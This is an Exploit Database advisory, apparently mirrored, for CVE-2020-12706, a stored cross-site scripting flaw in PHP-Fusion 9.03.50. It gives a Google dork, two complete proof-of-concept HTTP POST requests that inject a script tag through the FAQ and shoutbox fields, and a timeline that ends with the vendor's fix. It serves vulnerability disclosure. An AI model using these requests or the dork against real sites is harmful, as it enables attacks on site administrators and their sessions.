php-fusion 9.03.50 – Persistent Cross-Site Scripting

• Exploit Database
• 22 阅读

• 作者： SunCSR
  日期： 2020-05-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48404/

• # Exploit Title: php-fusion 9.03.50 - Persistent Cross-Site Scripting
  # Google Dork: "php-fusion"
  # Date: 2020-04-30
  # Exploit Author: SunCSR (Sun* Cyber Security Research)
  # Vendor Homepage: https://www.php-fusion.co.uk/
  # Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30
  # Version: 9.03.50
  # Tested on: Windows
  # CVE : CVE-2020-12706
  
  ### Vulnerability : Persistent Cross-Site Scripting
  
  ###Describe the bug
  Persistent Cross-site scripting (Stored XSS) vulnerabilities in PHP-Fusion 9.03.50 allow remote attackers to inject arbitrary web script or HTML
  via the go parameter to /infusions/faq/faq_admin.php, /infusions/shoutbox_panel/shoutbox_admin.php
  
  ###To Reproduce
  Steps to reproduce the behavior:
  Authenticated user submit Q&A or Shoutbox to admin
  
  ### POC:
  ## Submit Q&A:
  
  POST /php-fusion/submit.php?stype=q HTTP/1.1
  Host: TARGET
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------68756068726681644952075211938
  Content-Length: 1146
  Origin: http://TARGET
  DNT: 1
  Connection: close
  Referer: http://TARGET/php-fusion/submit.php?stype=q
  Cookie: xxx
  Upgrade-Insecure-Requests: 1
  
  -----------------------------68756068726681644952075211938
  Content-Disposition: form-data; name="fusion_token"
  
  2-1588232750-f839ed0754d5dc8aa577cfb660e273e711ec03a9a782de90ac34860cdb45a8f1
  -----------------------------68756068726681644952075211938
  Content-Disposition: form-data; name="form_id"
  
  submit_form
  -----------------------------68756068726681644952075211938
  Content-Disposition: form-data; name="fusion_PR57qY"
  
  
  -----------------------------68756068726681644952075211938
  Content-Disposition: form-data; name="faq_question"
  
  Question XSS
  -----------------------------68756068726681644952075211938
  Content-Disposition: form-data; name="faq_answer"
  
  xss</textarea><ScRiPt>alert('XSS')</ScRiPt>
  -----------------------------68756068726681644952075211938
  Content-Disposition: form-data; name="faq_cat_id"
  
  1
  -----------------------------68756068726681644952075211938
  Content-Disposition: form-data; name="faq_language[]"
  
  English
  -----------------------------68756068726681644952075211938
  Content-Disposition: form-data; name="submit_link"
  
  Submit
  -----------------------------68756068726681644952075211938--
  
  ## Shoutbox
  
  POST /php-fusion/infusions/downloads/downloads.php?cat_id=1 HTTP/1.1
  Host: TARGET
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 272
  Origin: http://TARGET
  DNT: 1
  Connection: close
  Referer: http://TARGET/php-fusion/infusions/downloads/downloads.php?cat_id=1
  Cookie: xxx
  Upgrade-Insecure-Requests: 1
  
  fusion_token=2-1588233429-3df5ba2b9c690e833548645f66a7772cf7fdb24ca9be130d5ff01e26351a2771&form_id=sbpanel&fusion_gEHiPs=&shout_id=0
  &shout_hidden=&shout_message=xss</textarea><ScRiPt>alert('XSS')</ScRiPt>&shout_language=English&shout_box=Save+Shout
  
  
  ###Reference:
  https://github.com/php-fusion/PHP-Fusion/issues/2306
  
  ### History
  =============
  2020-04-09Issue discovered
  2020-04-14Vendor contacted
  2020-04-28Vendor response and hotfix
  2020-04-29Vendor releases fixed